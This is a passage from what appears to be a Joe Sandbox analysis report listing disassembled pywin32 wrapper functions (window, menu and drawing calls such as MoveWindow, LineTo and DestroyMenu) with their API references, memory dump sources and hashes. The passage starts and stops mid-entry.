                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(Chord,00000000), ref: 6DAB4216
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_ChordError@@Object_ParseRestoreSaveTupleWin_
                            • String ID: Chord$Oiiiiiiii:Chord
                            • API String ID: 158727516-2891005786
                            • Opcode ID: c18a164b58060aeff4697885c880cab8cdb096d4afc578f284027fcf7a415e99
                            • Instruction ID: dde38a8e31136968dcf41d4dcabc43d286320af8a21d3b0234739fde0f9073e6
                            • Opcode Fuzzy Hash: c18a164b58060aeff4697885c880cab8cdb096d4afc578f284027fcf7a415e99
                            • Instruction Fuzzy Hash: 97213072408204AFCB019F91DD84E5BBBFDFF88704F444A29F995D1120E731DA6A9B93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB4090, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 68threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oiiiiiiii:ArcTo,?,?,?,?,?,?,?,?,?), ref: 6DAB40D0
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB40EC
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB40FB
                            • ArcTo.GDI32(?,?,?,?,?,?,?,?,?), ref: 6DAB4127
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB4130
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ArcTo,00000000), ref: 6DAB4146
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@Object_ParseRestoreSaveTupleWin_
                            • String ID: ArcTo$Oiiiiiiii:ArcTo
                            • API String ID: 2386446667-3779949223
                            • Opcode ID: 45c28a2d798ee254877a84f0302aacc2a43cc2e0b0d02c6932cb913744fb539b
                            • Instruction ID: b283a507b0dfe00f2b0069cb51260e488926a4f60338fd89de1495bf0535f227
                            • Opcode Fuzzy Hash: 45c28a2d798ee254877a84f0302aacc2a43cc2e0b0d02c6932cb913744fb539b
                            • Instruction Fuzzy Hash: 25215372408200AFCB019F51CD40E9BB7FDFF88304F044A19FA85D1120E731D9269B53
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB1CE0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 59threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oiiiii:MoveWindow,?,?,?,?,?,?), ref: 6DAB1D11
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB1D2D
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB1D3C
                            • MoveWindow.USER32(?,?,?,?,?,?), ref: 6DAB1D5C
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB1D65
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(MoveWindow,00000000), ref: 6DAB1D7B
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@MoveObject_ParseRestoreSaveTupleWin_Window
                            • String ID: MoveWindow$Oiiiii:MoveWindow
                            • API String ID: 1874448083-2698088070
                            • Opcode ID: ffee345ae7ad645c40098a0f574c3834711672c24819f6389d940cdfa7a62ee4
                            • Instruction ID: 9822a84088e2dd0299058a1bfec63c2d4de2a2c862a39004c53f0323f8e5abf7
                            • Opcode Fuzzy Hash: ffee345ae7ad645c40098a0f574c3834711672c24819f6389d940cdfa7a62ee4
                            • Instruction Fuzzy Hash: DC11827240C205AFCB019F55CD44BABBBF9FF84701F444A29F985D1121E731DA2A9BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAF990, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO:ImageList_ReplaceIcon,00000000,?), ref: 6DAAF9BA
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF9DB
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF9ED
                            Strings
                            • OiO:ImageList_ReplaceIcon, xrefs: 6DAAF9B1
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OiO:ImageList_ReplaceIcon
                            • API String ID: 1248562531-2107667488
                            • Opcode ID: 52aba8bfeee4fe124ae9c2bba7d338c75e103a6bf29ab6b3019c0cee5d3150aa
                            • Instruction ID: 2b9f24b917b118d474baf2f69802fd88772c00064caeb7c0e33b48d62c217be5
                            • Opcode Fuzzy Hash: 52aba8bfeee4fe124ae9c2bba7d338c75e103a6bf29ab6b3019c0cee5d3150aa
                            • Instruction Fuzzy Hash: 86118276408301AFDB019B29DC44AAB7BF9FF84245F448A29F885C2131F731D95A8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAB5E0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oi|i:GetScrollInfo,?,?), ref: 6DAAB601
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAB617
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAB635
                            • GetScrollInfo.USER32 ref: 6DAAB64A
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAB653
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetScrollInfo,00000000), ref: 6DAAB669
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@InfoObject_ParseRestoreSaveScrollTupleWin_
                            • String ID: GetScrollInfo$Oi|i:GetScrollInfo
                            • API String ID: 576370750-4287172120
                            • Opcode ID: 7a109d1832258297cbcf8a3970399e840b3a734925603a46f82f0ec17055fcdd
                            • Instruction ID: d85da7861c7a3bdbd25a3a0fb0b85db62d3cf4b4d41196361a70ca01ae936b71
                            • Opcode Fuzzy Hash: 7a109d1832258297cbcf8a3970399e840b3a734925603a46f82f0ec17055fcdd
                            • Instruction Fuzzy Hash: 4A1173B540C305AFD700DF65CC44A6BBBF8FF55211F084A29F985C2121E771C65A8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAADD50, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oiii:SetDlgItemInt,?,?,?,?), ref: 6DAADD77
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAADD93
                            • PyEval_SaveThread.PYTHON38 ref: 6DAADDA2
                            • SetDlgItemInt.USER32(?,?,?,?), ref: 6DAADDBA
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAADDC3
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetDlgItemInt,00000000), ref: 6DAADDD9
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@ItemObject_ParseRestoreSaveTupleWin_
                            • String ID: Oiii:SetDlgItemInt$SetDlgItemInt
                            • API String ID: 2484478725-3215803418
                            • Opcode ID: 9aabeac73a0956d51acab296210a36fb8a2aad04dd851b989c4711d92b215a8a
                            • Instruction ID: bed6a8a155596bfcb5424432aca9b6ad240c6e483b6f5fe5ff8ee5750f4d034b
                            • Opcode Fuzzy Hash: 9aabeac73a0956d51acab296210a36fb8a2aad04dd851b989c4711d92b215a8a
                            • Instruction Fuzzy Hash: 28118E76408201AFCB019F54CD45A6B77F8FF85601F488A69FC85D2121E731D92ADBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB7980, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:IsChild,?), ref: 6DAB79A5
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB79C6
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB79D8
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OO:IsChild
                            • API String ID: 1248562531-3764942029
                            • Opcode ID: 707fc554cfb7a72995c569f4179718f0b1f82727931c965c73854d1924ae4895
                            • Instruction ID: bb0242a4cd422d316bbda81f9530249491efbc21c3ca54b078d130b6932153f1
                            • Opcode Fuzzy Hash: 707fc554cfb7a72995c569f4179718f0b1f82727931c965c73854d1924ae4895
                            • Instruction Fuzzy Hash: D0016135808311AFEB009B28CC45AAB7BFDFF84205F848969F898C1121F371D95A9A92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB7C90, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:ReleaseDC,?), ref: 6DAB7CB5
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7CD6
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7CE8
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OO:ReleaseDC
                            • API String ID: 1248562531-1002941454
                            • Opcode ID: e33bbc9cf6c491e1859885b51357e795e5ffbd4160befbcf389d4522a93d06e6
                            • Instruction ID: 7ddec5b972ca0e74d308078cafda71199342b835aaffae2bd72a5adb3d2a5346
                            • Opcode Fuzzy Hash: e33bbc9cf6c491e1859885b51357e795e5ffbd4160befbcf389d4522a93d06e6
                            • Instruction Fuzzy Hash: 5D018075808311AFEB00AB29CC45ABB7BFDFF85205F848969FC94C1121F331895A9A92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB3DA0, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oii:LineTo,?,?,?), ref: 6DAB3DC2
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB3DDE
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB3DED
                            • LineTo.GDI32(?,?,?), ref: 6DAB3E01
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB3E0A
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(LineTo,00000000), ref: 6DAB3E20
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@LineObject_ParseRestoreSaveTupleWin_
                            • String ID: LineTo$Oii:LineTo
                            • API String ID: 93188945-3242789199
                            • Opcode ID: bd7dbbbfdbf721570ce1e23737fb6865e168345daf93f629b08107871b08abe9
                            • Instruction ID: 0aa4b89ea9a7b92388c1ffeb4a8539109c1a3b542ed30ef2674caa4f0540083a
                            • Opcode Fuzzy Hash: bd7dbbbfdbf721570ce1e23737fb6865e168345daf93f629b08107871b08abe9
                            • Instruction Fuzzy Hash: B501C076408301AFDB016B14CC44B6B7BF8FF85211F488929F999C1131E731892A8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB1DA0, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 44threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:CloseWindow), ref: 6DAB1DB7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB1DD3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB1DE2
                            • CloseWindow.USER32 ref: 6DAB1DEE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB1DF7
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CloseWindow,00000000), ref: 6DAB1E0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_CloseError@@Object_ParseRestoreSaveTupleWin_Window
                            • String ID: CloseWindow$O:CloseWindow
                            • API String ID: 1389620691-1835457876
                            • Opcode ID: ff9dc2bc98dfd9b11f0bef98e50506812dc7e51826b775ac4b158bef4affa3ef
                            • Instruction ID: ca9e1b67d4b2c393bed1b9cc46e7144072eba42445879782d6ec64f823bd41b9
                            • Opcode Fuzzy Hash: ff9dc2bc98dfd9b11f0bef98e50506812dc7e51826b775ac4b158bef4affa3ef
                            • Instruction Fuzzy Hash: B9016275808201AFCF016F65EC4973A7BB8FF41752F484934FC45C2122E735992BDAA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB0990, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 44threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:UpdateWindow), ref: 6DAB09A7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB09C3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB09D2
                            • UpdateWindow.USER32(?), ref: 6DAB09DE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB09E7
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(UpdateWindow,00000000), ref: 6DAB09FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@Object_ParseRestoreSaveTupleUpdateWin_Window
                            • String ID: O:UpdateWindow$UpdateWindow
                            • API String ID: 1428509002-2149152021
                            • Opcode ID: 3195e5884d260e154d6287468713615f4e3b2b39a05c66b108e5130cf006bee5
                            • Instruction ID: 11e3c1ed1c1d33bbc2429842b4342c5412c90b1ade5efa7240e455791566fc4b
                            • Opcode Fuzzy Hash: 3195e5884d260e154d6287468713615f4e3b2b39a05c66b108e5130cf006bee5
                            • Instruction Fuzzy Hash: 010162758082019FDF016B65DD4972A77B8FF91712F484934FC45C1221E735892BDAA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB69E0, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 44threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:FlattenPath), ref: 6DAB69F7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB6A13
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB6A22
                            • FlattenPath.GDI32(?), ref: 6DAB6A2E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB6A37
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(FlattenPath,00000000), ref: 6DAB6A4D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@FlattenObject_ParsePathRestoreSaveTupleWin_
                            • String ID: FlattenPath$O:FlattenPath
                            • API String ID: 1595511286-2618610921
                            • Opcode ID: d7ed0778aadf5cd925349f13e35e23fbf62a9306de158a52ccda828004bb682c
                            • Instruction ID: db80eb57c291aab972d4f61fca7b379ccc5aea1834081fdc401ac3439cd6ca88
                            • Opcode Fuzzy Hash: d7ed0778aadf5cd925349f13e35e23fbf62a9306de158a52ccda828004bb682c
                            • Instruction Fuzzy Hash: 2701D6758082009FCF006F65EC4972A7BB8FF41712F488938FD45C1222E335892BCAA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAE540, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 44threadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:DestroyMenu), ref: 6DAAE557
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAE573
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAE582
                            • DestroyMenu.USER32(?), ref: 6DAAE58E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAE597
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(DestroyMenu,00000000), ref: 6DAAE5AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_DestroyError@@MenuObject_ParseRestoreSaveTupleWin_
                            • String ID: DestroyMenu$O:DestroyMenu
                            • API String ID: 809177625-260514386
                            • Opcode ID: 4aa49be5d3af214656bcc98da05339e341d23f09139b13691bedc0de066f8038
                            • Instruction ID: 37517a98f5981956541304a82ef255af181c285560a46840bb24c45a01096e01
                            • Opcode Fuzzy Hash: 4aa49be5d3af214656bcc98da05339e341d23f09139b13691bedc0de066f8038
                            • Instruction Fuzzy Hash: 0B0162759082019FCF006B65AC49B2A7BB4FF81606F488634FC45C2221F7359A2BDAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB6950, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 44threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:CloseFigure), ref: 6DAB6967
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB6983
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB6992
                            • CloseFigure.GDI32(?), ref: 6DAB699E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB69A7
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CloseFigure,00000000), ref: 6DAB69BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_CloseError@@FigureObject_ParseRestoreSaveTupleWin_
                            • String ID: CloseFigure$O:CloseFigure
                            • API String ID: 692702369-654909274
                            • Opcode ID: 28b396b4de6e9e96b5b47bd6b7e9d78e631fa99bd6ec793c04c1cccdb6aa8287
                            • Instruction ID: 72a932a12c4e4be0d25e810ba1811550b4262b552a951b746f911ceb72b34c18
                            • Opcode Fuzzy Hash: 28b396b4de6e9e96b5b47bd6b7e9d78e631fa99bd6ec793c04c1cccdb6aa8287
                            • Instruction Fuzzy Hash: 0D01A275808200AFCF006F24AC4976A7BB8FF41716F484634FC49C1222E735892BCAE2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB0480, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 44threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:HideCaret), ref: 6DAB0497
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB04B3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB04C2
                            • HideCaret.USER32(?), ref: 6DAB04CE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB04D7
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(HideCaret,00000000), ref: 6DAB04ED
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_CaretError@@HideObject_ParseRestoreSaveTupleWin_
                            • String ID: HideCaret$O:HideCaret
                            • API String ID: 3633322568-2873150280
                            • Opcode ID: a88879b1493820a14285013cb316df9746216597aa873ecd59a64fbdd28813fa
                            • Instruction ID: 191dd518746c7660585d02ab75d6b8e3b5e106a85bd6735505e1305e0c9097ee
                            • Opcode Fuzzy Hash: a88879b1493820a14285013cb316df9746216597aa873ecd59a64fbdd28813fa
                            • Instruction Fuzzy Hash: 2E01D6758082019FCF006F75DD49B2A7BB8FF81712F488534FC85C1121E735896BCAA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB68C0, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 44threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:AbortPath), ref: 6DAB68D7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB68F3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB6902
                            • AbortPath.GDI32(?), ref: 6DAB690E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB6917
